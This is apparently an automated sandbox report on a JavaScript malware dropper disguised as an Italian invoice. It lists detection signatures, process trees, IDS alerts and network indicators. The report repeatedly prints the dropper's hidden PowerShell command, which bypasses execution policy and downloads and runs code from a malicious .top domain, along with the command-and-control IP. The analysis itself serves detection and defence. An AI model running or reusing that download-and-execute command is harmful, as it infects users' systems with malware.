Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fattura72543461.js

Overview

General Information

Sample name:Fattura72543461.js
Analysis ID:1576661
MD5:40ef9511d762c47c5876246943671176
SHA1:e1bc94a2f751ddc15f9aeb28c88ecb9b79ed36cd
SHA256:0c5c602416e2297e797efae478763caeef6f0e5f49fc21e6877f765d852680a9
Tags:jsmbuzy3yvzw3r-topSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Suricata IDS alerts for network traffic
Bypasses PowerShell execution policy
Deletes itself after installation
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries Google from non browser process on port 80
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 7468 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", ProcessId: 7468, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7468, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", ProcessId: 7836, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7468, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", ProcessId: 7836, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", ProcessId: 7468, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7468, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex", ProcessId: 7836, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T11:31:37.466142+010020570631A Network Trojan was detected192.168.2.84970845.61.137.7180TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T11:31:37.466142+010020577431A Network Trojan was detected192.168.2.84970845.61.137.7180TCP

Click to jump to signature section

Show All Signature Results
Source: Binary string: softy.pdbdll source: powershell.exe, 00000003.00000002.1801297691.0000024973C52000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoottu source: powershell.exe, 00000003.00000002.1799160354.0000024971C68000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.1801297691.0000024973C10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdbdb source: powershell.exe, 00000003.00000002.1801297691.0000024973CA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbicKeyToken=b77a5c561934e089 source: powershell.exe, 00000003.00000002.1799160354.0000024971C68000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: Fattura72543461.jsArgument value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw']Go to definition
Source: Fattura72543461.jsArgument value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw', '"Scripting.FileSystemObject"']Go to definition
Source: Fattura72543461.jsReturn value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw', '"Scripting.FileSystemObject"']Go to definition
Source: Fattura72543461.jsReturn value : ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb \'http://mbuzy3yvzw', '"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.8:49708 -> 45.61.137.71:80
Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.8:49708 -> 45.61.137.71:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.137.71 45.61.137.71
Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mbuzy3yvzw3r.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mbuzy3yvzw3r.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: mbuzy3yvzw3r.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000003.00000002.1782264899.000002490132D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbuzy3yvzw3r.top
Source: powershell.exe, 00000003.00000002.1799160354.0000024971C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbuzy3yvzw3r.top/1.php?s=mints13
Source: powershell.exe, 00000003.00000002.1782264899.00000249018C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1782264899.000002490186A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249012CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000003.00000002.1782264899.0000024900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1782264899.000002490186A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&ec=GAZAAQ
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000003.00000002.1782264899.0000024900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249003A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.0000024910010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.000002490038E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000003.00000002.1782264899.000002490186A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249003A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.0000024910010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000003.00000002.1782264899.00000249018C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000003.00000002.1782264899.000002490046D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024
Source: powershell.exe, 00000003.00000002.1782264899.0000024900F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000003.00000002.1782264899.00000249003BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249003A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.000002491006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.0000024910010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.00000249015F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://notebooklm.google/audio%3Futm_source%3Dgoogle%26utm_medium%3Dhp
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1796363921.00000249102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1782264899.0000024901651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000003.00000002.1782264899.0000024900557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000003.00000002.1782264899.0000024900A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4A1720B83_2_00007FFB4A1720B8
Source: Fattura72543461.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal92.expl.evad.winJS@4/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntevb3hz.hcz.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
